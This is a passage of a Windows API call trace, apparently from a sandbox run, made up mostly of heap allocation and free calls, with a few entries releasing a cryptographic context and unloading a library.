lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.091] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0104.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0104.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0104.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.093] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0104.093] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0104.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0104.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0104.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.095] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0104.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.095] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0104.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.096] FreeLibrary (hLibModule=0x756e0000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0104.096] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0104.096] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.096] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0104.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0104.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0104.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0104.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0104.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0104.097] CloseHandle (hObject=0x258) returned 1 [0104.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0104.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.102] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0104.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0104.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0104.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0104.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0104.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.103] CloseHandle (hObject=0x298) returned 1 [0104.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0104.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0104.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0104.107] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0104.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0104.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0104.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.110] 